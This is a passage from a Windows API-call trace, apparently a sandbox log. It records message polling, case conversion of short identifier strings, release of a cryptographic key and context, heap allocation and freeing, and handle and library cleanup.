hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0250.055] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.055] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0250.055] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0250.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.055] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0250.055] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0250.055] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0250.055] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0250.056] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0250.056] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0250.056] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0250.056] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0250.056] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0250.056] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0250.056] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0250.056] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0250.056] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0250.056] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0250.056] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0250.060] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0250.060] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0250.060] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0250.060] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0250.060] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0250.060] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.061] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0250.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.061] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0250.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.061] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0250.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0250.061] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0250.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0250.061] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.061] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0250.062] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0250.062] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0250.062] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0250.062] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0250.062] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.062] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.062] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.062] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.062] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.062] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.062] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0250.062] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.062] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0250.062] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.063] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.063] CryptReleaseContext (hProv=0xad2720, dwFlags=0x0) returned 1 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0250.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0250.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0250.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0250.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0250.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0250.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0250.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0250.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0250.065] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0250.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0250.065] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0250.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0250.066] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0250.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0250.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0250.066] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0250.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0250.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0250.067] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0250.067] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0250.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0250.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0250.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.068] FreeLibrary (hLibModule=0x74d40000) returned 1 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.068] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0250.068] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0250.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0250.068] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0250.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0250.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0250.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0250.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0250.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.069] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0250.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0250.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0250.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0250.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0250.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0250.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0250.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0250.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0250.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0250.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.071] CloseHandle (hObject=0x2bc) returned 1 [0250.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0250.071] HeapFree (in: 